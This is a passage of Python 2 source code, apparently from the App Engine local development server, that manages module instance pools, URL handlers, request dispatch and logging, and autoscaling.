"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
An instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
A list of url_handler.URLHandlers that can handle requests as
described in the given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_server.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_server.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=has_file_changes)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._cloud_sql_config = cloud_sql_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
@property
def name(self):
"""The name of the module, as defined in app.yaml.
This value will be constant for the lifetime of the module even if the
module configuration changes.
"""
return self._name
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
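# Example (added for clarity): with host 'localhost' and a balanced port of
# 8080 this property returns 'localhost:8080'; when the balanced port is 80
# it returns just 'localhost', mirroring how the default HTTP port is
# omitted from host strings.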
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status):
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.major_version,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'TRACE') and
int(environ.get('CONTENT_LENGTH') or '0') != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
with self._handler_lock:
handlers = self._handlers
try:
request_url = environ['PATH_INFO']
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(request_url)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', request_url)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
_THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
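# Illustrative outputs (added; actual values are random at runtime):
#   generate_request_log_id()  -> 30-99 lowercase hex digits, e.g. '7f0a3c...'
#   generate_request_id_hash() -> exactly 8 uppercase hex digits, e.g. '1A2B3C4D'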
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
Raises:
request_info.NotSupportedWithAutoScalingError: Always.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._cloud_sql_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
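# Hedged usage sketch (added; argument values are illustrative): internal
# requests are synthesized with this helper, e.g.
#   environ = self.build_request_environ(
#       'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
#       fake_login=True)
# which matches how _warmup and _shutdown_instance drive instances.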
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
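# Worked examples (added; inputs follow the appinfo-validated forms):
#   _parse_pending_latency('0.1s')   -> 0.1
#   _parse_pending_latency('1000ms') -> 1.0
# The parser assumes a trailing 's' or 'ms' suffix; other forms are not
# handled here.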
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
# A deque containing (time, num_outstanding_instance_requests) 2-tuples.
# This is used to track the maximum number of outstanding requests in a time
# period. Protected by self._condition.
self._outstanding_request_history = collections.deque()
self._num_outstanding_instance_requests = 0 # Protected by self._condition.
# The time when the last instance was quit in seconds since the epoch.
self._last_instance_quit_time = 0 # Protected by self._condition.
self._condition = threading.Condition() # Protects instance state.
self._instance_adjustment_thread = threading.Thread(
target=self._loop_adjusting_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._instance_adjustment_thread.start()
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._instance_adjustment_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher, so wait for it to exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
with self._condition:
instances = self._instances
self._instances = set()
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
@property
def num_outstanding_instance_requests(self):
"""The number of requests that instances are currently handling."""
with self._condition:
return self._num_outstanding_instance_requests
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if request_type != instance.READY_REQUEST:
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
logging.debug('Dispatching request to %s', inst)
return inst.handle(environ, start_response, url_map, match, request_id,
request_type)
finally:
with self._condition:
if request_type != instance.READY_REQUEST:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
with self._condition:
self._num_outstanding_instance_requests += 1
self._outstanding_request_history.append(
(time.time(), self.num_outstanding_instance_requests))
try:
start_time = time.time()
timeout_time = start_time + self._min_pending_latency
# Loop until an instance is available to handle the request.
while True:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if not inst:
inst = self._add_instance(permit_warmup=False)
if not inst:
# No instance is available nor can a new one be created, so loop
# waiting for one to be free.
timeout_time = time.time() + 0.2
continue
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ,
start_response,
url_map,
match,
request_id,
request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._num_outstanding_instance_requests -= 1
self._condition.notify()
def _add_instance(self, permit_warmup):
"""Creates and adds a new instance.Instance to the Module.
Args:
permit_warmup: If True then the new instance.Instance will be sent a new
warmup request if it is configured to receive them.
Returns:
The newly created instance.Instance. Returns None if no new instance
could be created because the maximum number of instances have already
been created.
"""
if self._max_instances is not None:
with self._condition:
if len(self._instances) >= self._max_instances:
return None
perform_warmup = permit_warmup and (
'warmup' in (self._module_configuration.inbound_services or []))
inst = self._instance_factory.new_instance(
self.generate_instance_id(),
expect_ready_request=perform_warmup)
with self._condition:
if self._quit_event.is_set():
return None
self._instances.add(inst)
if not inst.start():
return None
if perform_warmup:
self._async_warmup(inst)
else:
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
logging.debug('Created instance: %s', inst)
return inst
@staticmethod
def generate_instance_id():
return ''.join(random.choice(_LOWER_HEX_DIGITS) for _ in range(36))
def _warmup(self, inst):
"""Send a warmup request to the given instance."""
try:
environ = self.build_request_environ(
'GET', '/_ah/warmup', [], '', '0.1.0.3', self.balanced_port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling warmup request.')
def _async_warmup(self, inst):
"""Asynchronously send a markup request to the given Instance."""
_THREAD_POOL.submit(self._warmup, inst)
def _trim_outstanding_request_history(self):
"""Removes obsolete entries from _outstanding_request_history."""
window_start = time.time() - self._REQUIRED_INSTANCE_WINDOW_SECONDS
with self._condition:
while self._outstanding_request_history:
t, _ = self._outstanding_request_history[0]
if t < window_start:
self._outstanding_request_history.popleft()
else:
break
def _get_num_required_instances(self):
"""Returns the number of Instances required to handle the request load."""
with self._condition:
self._trim_outstanding_request_history()
if not self._outstanding_request_history:
return 0
else:
peak_concurrent_requests = max(
current_requests
for (t, current_requests)
in self._outstanding_request_history)
# Use float division so math.ceil is meaningful under Python 2's
# truncating integer division.
return int(math.ceil(peak_concurrent_requests /
float(self.max_instance_concurrent_requests)))
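# Worked example (added; numbers are illustrative): with a peak of 25
# concurrent requests in the 60s window and instances that each handle 10
# concurrent requests, int(math.ceil(25 / 10.0)) == 3 instances are required.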
def _split_instances(self):
"""Returns a 2-tuple representing the required and extra Instances.
Returns:
A 2-tuple of (required_instances, not_required_instances):
required_instances: The set of the instance.Instances, in a state that
can handle requests, required to handle the current
request load.
not_required_instances: The set of the Instances contained in this
Module that are not required.
"""
with self._condition:
num_required_instances = self._get_num_required_instances()
available = [inst for inst in self._instances
if inst.can_accept_requests]
available.sort(key=lambda inst: -inst.num_outstanding_requests)
required = set(available[:num_required_instances])
return required, self._instances - required
def _choose_instance(self, timeout_time):
